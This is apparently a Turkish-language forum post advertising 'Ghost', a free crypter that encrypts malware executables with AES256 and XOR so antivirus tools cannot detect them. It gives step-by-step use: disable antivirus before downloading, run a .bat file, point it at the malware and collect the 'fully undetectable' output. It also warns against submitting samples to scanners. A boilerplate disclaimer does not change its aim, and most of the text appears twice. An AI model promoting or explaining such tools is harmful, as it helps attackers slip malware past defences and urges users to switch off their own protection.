Windows üzerinde hâlâ FUD olabilen TEK ÜCRETSİZ ve %100 FUD kripter. Antivirüslerin tespitinden kaçmak için güçlü bir gizleyici.
STUB'ı HEP FUD OLACAĞI şekilde GÜNCELLEYECEĞİM ve emeğimi karşılamak için
TOTAL gibi çöplere YÜKLEMEYİN
Hâlâ FUD olacak tek kripteri yapma hayaline katkıda bulunun.
Bu FUD kripteri kendim için oluşturdum ama paylaşmaya karar verdim.
Herkesin erişebilmesi için onu basitleştirdim, bu yüzden kullanımı çok kolay ve zaten derlenmiş.
Aslında Windows için yapıldı ama kaynak kodunu yayınlayacağım ve Linux kullanıcılarının da kullanabilmesi için biraz değiştireceğim (wine üzerinde denedim ama çalışmıyor).
| Stub şimdiden 6 kez güncellendi.
Kullanım/Yükleme: İndirmeden önce Anti-çöp programınızı devre dışı bırakmanız gerekecek, aksi takdirde kriptolanmış dosyanız Anti-çöp şirketine gönderilir.
İNDİRMEK İÇİN BURAYA TIKLAYIN.
Kullanımdan önce ÇIKARTIN, aksi takdirde dosya düzgün çalışmaz.
Ghost-fud-crypter.bat dosyasını çalıştırın. Girdiyi ayarlayın (Kötü amaçlı yazılımın yolunu belirtin) Algılanamaz hale getirin) ve dosyanın oluşturulmasını istediğiniz dizini çıkış olarak seçin. "! ŞİMDİ ŞİFRELE !" düğmesine tıklayın, işlem birkaç dakika sürebilir.
Sonunda FUD şifreli kötü amaçlı yazılımınızın keyfini çıkarın! Nasıl çalışıyor? GHOST karmaşık bir AES256 ve XOR şifrelemesine sahip. Exe dosyanızın byte'larını şifreliyor, böylece bellek üzerinde şifreli kalıyor ve çalıştırma sırasında çözülüyor.
Feragat 
BU BETİĞİ -Redacted- AMAÇLAR İÇİN KULLANMAYIN
TÜM GEÇERLİ YEREL, EYALET VE FEDERAL YASALARA UYMAK SON KULLANICININ SORUMLULUĞUNDADIR. GELİŞTİRİCİLER, BU PROGRAMIN KULLANIMINDA YA DA VERDİĞİ ZARARLARDA HİÇBİR SORUMLULUK ÜSTLENMEZ VE SORUMLU DEĞİLDİR.
STUB'ı HEP FUD OLACAĞI şekilde GÜNCELLEYECEĞİM ve emeğimi karşılamak için
Bu FUD kripteri kendim için oluşturdum ama paylaşmaya karar verdim.
Herkesin erişebilmesi için onu basitleştirdim, bu yüzden kullanımı çok kolay ve zaten derlenmiş.
Aslında Windows için yapıldı ama kaynak kodunu yayınlayacağım ve Linux kullanıcılarının da kullanabilmesi için biraz değiştireceğim (wine üzerinde denedim ama çalışmıyor).
| Stub şimdiden 6 kez güncellendi.
Kullanım/Yükleme: İndirmeden önce Anti-çöp programınızı devre dışı bırakmanız gerekecek, aksi takdirde kriptolanmış dosyanız Anti-çöp şirketine gönderilir.
İNDİRMEK İÇİN BURAYA TIKLAYIN.
Kullanımdan önce ÇIKARTIN, aksi takdirde dosya düzgün çalışmaz.
Ghost-fud-crypter.bat dosyasını çalıştırın. Girdiyi ayarlayın (Kötü amaçlı yazılımın yolunu belirtin) Algılanamaz hale getirin) ve dosyanın oluşturulmasını istediğiniz dizini çıkış olarak seçin. "! ŞİMDİ ŞİFRELE !" düğmesine tıklayın, işlem birkaç dakika sürebilir.
Sonunda FUD şifreli kötü amaçlı yazılımınızın keyfini çıkarın! Nasıl çalışıyor? GHOST karmaşık bir AES256 ve XOR şifrelemesine sahip. Exe dosyanızın byte'larını şifreliyor, böylece bellek üzerinde şifreli kalıyor ve çalıştırma sırasında çözülüyor.